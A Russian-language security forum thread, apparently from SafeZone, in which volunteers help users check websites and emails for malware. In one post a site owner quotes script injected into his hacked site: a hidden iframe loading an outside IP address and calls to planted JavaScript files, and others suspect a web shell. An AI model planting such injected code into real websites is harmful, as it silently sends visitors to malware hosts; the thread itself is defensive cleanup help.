1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

Тема в разделе "Сетевая безопасность для начинающих", создана пользователем akok, 19 янв 2009.

Статус темы:
Закрыта.
  1. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.715
    Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

    Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

    Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
    1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
    2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
    3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
    4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

    *Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
     
    5 пользователям это понравилось.
  2. regist

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.989
    Симпатии:
    5.578
    у меня нет фейсбука и никогда не было :p, но иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить :rolleyes:
     
  3. shestale

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    9.057
    Симпатии:
    4.822
    Dragokas, есть один детект у Norman на Redirector.KV, больше пока ни чего сказать не могу, так как сегодня у меня с интернетом проблемы...на страничке есть ссылки на .js, скачай и посмотри, ты же в них разбираешься ;)
     
  4. orderman

    orderman Активный пользователь

    Сообщения:
    1.164
    Симпатии:
    1.397
    regist, если не ошибаюсь, то на фейсбуке есть возможность пригласить друзей используя адресную книгу почтового ящика. Так что если у кого-то из друзей есть ваш адрес, то от него и письмо;)
     
    machito нравится это.
  5. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.715
    Тут может быть все, от банального фишинга, до "упаривания" зловреда.
     
  6. Phoenix

    Phoenix Активный пользователь

    Сообщения:
    2.038
    Симпатии:
    2.016
    Dragokas,конечный сайт - hттp://postila.ru/ ,ваша ссылка это реферал (имхо но твёрдое :)) то есть, если товары купят (или что там) по этой ссылке, то хозяину реферала бонус.
    Кстати, вы уже видели новый сервис http://vms.drweb.com/online/ (только не смейтесь, проверьте ссылку, сервис классный ;))
    перенаправляет на
    hттp://postila.ru/user/lp/m/хххххххххххххххххххххххххххх/h/b69741837863417d3dffdg61e97f7?email=2c930afa59bdgdg9db2c441cac4516ed5

    (hттp://my.mail.ru/mail/хххххххххххххх - существует)
    Я подставил мёртвый адрес и редиректнулся.
     
    Последнее редактирование модератором: 3 ноя 2013
    machito и Dragokas нравится это.
  7. regist

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.989
    Симпатии:
    5.578
    Phoenix, читаем шапку темы и не всталяем на форуме активные потенциально вредоносные ссылки!

    UPD
    . ссылки выше подправил убрав личную информацию.
     
    Последнее редактирование: 3 ноя 2013
    Phoenix нравится это.
  8. Dragokas

    Dragokas Very kind Developer Команда форума Супер-Модератор Разработчик Клуб переводчиков

    Сообщения:
    5.146
    Симпатии:
    5.030
    Phoenix, просьба также предварительно согласовывать выкладывание в открытый доступ дешифрованных персональных данных.
    Спасибо.
     
    Phoenix нравится это.
  9. SNS-amigo

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.217
    Симпатии:
    8.912
    Это немного не так. Там есть предлагаемая возможность пригласить друзей и абонентов, используя ваш адрес email, который был введен при регистрации на FB. С точки зрения тех.администрации это простой процесс создать аудиторию для себя лично и для созданных вами групп.
    Действует этот так. Предложение "Пригласите друзей, используя email" вылезает очень часто, кто-то по незнанию или по осознанному желанию ответил на это предложение и ввел пароль от своей почты в предлагаемое поле. После этого FB автоматом авторизуется в его почте, считывает там адресную книгу — контакты адресатов и абонентов, которые вам присылали почту и получали её от вас.

    [​IMG] [​IMG] [​IMG]

    Не скажу, что FB самая защищенная сеть, но конфиденциальности там уделяется немало времени. Именно из-за этого FB довольно "туг на ухо". Но имеется возможность защищить свою учетную запись специальными решениями разработчиков средств безопасности. Это можно, например, сделать из программ Norton, или подключить специальное приложение Norton Safe Web, чтобы выполнялся Norton Auto-Scan.

    [​IMG] [​IMG]
     
    machito, Phoenix и Dragokas нравится это.
  10. SNS-amigo

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.217
    Симпатии:
    8.912
    Забыл сказать, что для того, чтобы подключить специальное приложение Norton Safe Web, не обязательно быть пользователем программ Нортон. Но именно это приложение действует наиболее эффективно в плане защиты и фильтрации спама. Потому у тебя нет ни спама, не левых поползновений и никто не жалуется на твою учетку, действующую самовольно.
    Вот страница самого приложения NSW в FB: https://apps.facebook.com/nortonsafeweb/
    А вот другие приложения (игры, календарь и пр. пр.) после подключения к вам получают монопольный доступ к вашему аккаунту и от вашего имени могут рассылать приглашения. Впрочем, так не только в FB, но только FB честно предупреждает об этом при добавлении приложения. В других соц.сетях этого предупреждения может и не быть, а суть та же, приложение будет надоедать и спамить за вас.
     
    Последнее редактирование: 4 ноя 2013
    Phoenix и machito нравится это.
  11. Ekliptika

    Ekliptika Пользователь

    Сообщения:
    2
    Симпатии:
    0
    Добрый день!

    Сегодня пришло на почту следующее письмо:
    Отправитель: "Voicemail" <admin@ledgo.ru>
    Тема: [VIRUS] Voicemail Message
    Дата: 18 ноября 2013 г., 13:04:11 GMT+4
    Получатель: maslov@ledgo.ru

    The attached message from Voicemail <admin@ledgo.ru>
    was found to contain the virus "Sanesecurity.Malware.22801.ZipHeur.UNOFFICIAL(7cc92d5b83b12 b9ddb82abd377e9f992:7106)".
    The infected portion of the message was removed by Virus Blocker.
    Значит ли это, что на сайте появился новый вирус?

    Сайт ledgo.ru.

    А еще постоянно (с интервалом 15 минут) приходят на почту письма такого содержания:
    Отправитель: root@bitrix118.timeweb.ru (Cron Daemon)
    Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
    Дата: 15 ноября 2013 г., 13:15:01 GMT+4
    Получатель: ilgam@ledgo.ru

    Could not open input file: /home/t/talipov/mega-shara/public_html/autobacup.php
    Что это и как с этим бороться?
     
    Последнее редактирование: 18 ноя 2013
  12. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.715
    Проверьте наличие файла, cron не может его найти и шлет ошибки.


    Не факт, проверьте, что рассылает форум. Срабатывание идет именно на почтовые сообщения.
     
    machito нравится это.
  13. S10

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Привет, друзья. Вновь обращаюсь к вам за подсказкой в поиске вредоносного кода...
    Гугл считает сайт зараженным. Помогите, плиз, отыскать заразу.
    Причём непонятно как вредоносный код мог попасть на сайт, если к сайту блокирован доступ по ФТП...

    Сайт хттп://rhl-mod.ru
     
  14. regist

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.989
    Симпатии:
    5.578
    и считает, что вы распрастаряли зловредов, подробней тут.
     
  15. akok

    akok Команда форума Администратор

    Лучший автор месяца

    Сообщения:
    13.624
    Симпатии:
    14.715
    shell отлично справляется
     
  16. S10

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    regist, я всю эту информацию от гугла изучил и мне понятно, что сайт взломали с целью распространения чего-то вредоносного. Но вот на какие кокретно строки в коде идёт реакция от гугла? Надеюсь, что мне профи подскажут...
     
  17. regist

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.989
    Симпатии:
    5.578
    S10 и shestale нравится это.
  18. S10

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Спасибо!
    Опять счётчик) Помню однажды этот счётчик меня уже подводил, но не думаю что только в счётчике дело, т.к Akok правильно предположил что на сайте может быть шелл.

    Сам я не бездействую ни в коем случае, у меня вот такая информация:
    В некоторые страницы и скрипты сайта в конец дописывали такую строку:
    document.write('<iframe src="хттп://5.63.152.144/?id=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>');

    Также вызывались ещё подсаженные js
    ;document.write("<scr"+"ipt src='/images/regimage/backgrounds/dbzgt.js'><"+"/script>");
    ;document.write("<scr"+"ipt src='/images/pagination/alley.js'><"+"/script>");
    Если надо - могу содержание этих js выложить, там много кода

    Сейчас я это вычистил, левые js удалил. Но я уверен что это всё появится снова. Найти шелл пока не получается, т.к ищу вручную, а файлов довольно много. Вирус судя по всему какой-то злостный, а я далеко не матёрый борец с вирусами)
     
    Последнее редактирование: 15 дек 2013
  19. shestale

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    9.057
    Симпатии:
    4.822
    S10, regist прав:
     
    Последнее редактирование: 15 дек 2013
    S10 нравится это.
  20. regist

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.989
    Симпатии:
    5.578
    S10, ещё подозрительно что при попытке зайти на ваш сайт (хттп://rhl-mod.ru) подряд происходит два редиректа (сначала на rhl-mod.ru/content.php?s=f9cb94c2f7b20cb8d469af93737a3a95 потом на rhl-mod.ru/content) - .htaccess рекомендую проверить, а так никакого shell-a не заметил там.
     
    Последнее редактирование: 15 дек 2013
    shestale нравится это.
  21. S10

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Да, парни, счётчики я убрал пока что. Но это тоже тема для разговора почему собсно коды счётчиков заражаются... Это же лайвинтернет - безобидный сервис по идее... Второй раз такое со счётчиками. Причём в первом случае ругался только яндекс, теперь только гугл)
    ---------------
    regist, может содержимое хтакцесс прислать? Но в таком виде там такие редиректы не прописаны. Это обилие букв после content.php - это может быть какая-нибудь вирусоопасная зашифровка?
     
Загрузка...
Похожие темы - Проверить сайт наличие
  1. Oleg
    Ответов:
    4
    Просмотров:
    1.443
  2. mayra
    Ответов:
    17
    Просмотров:
    2.415
  3. magirus
    Ответов:
    2
    Просмотров:
    730
  4. BLO100
    Ответов:
    5
    Просмотров:
    688
  5. Loader
    Ответов:
    6
    Просмотров:
    675
  6. alfabravo
    Ответов:
    5
    Просмотров:
    637
Статус темы:
Закрыта.

Поделиться этой страницей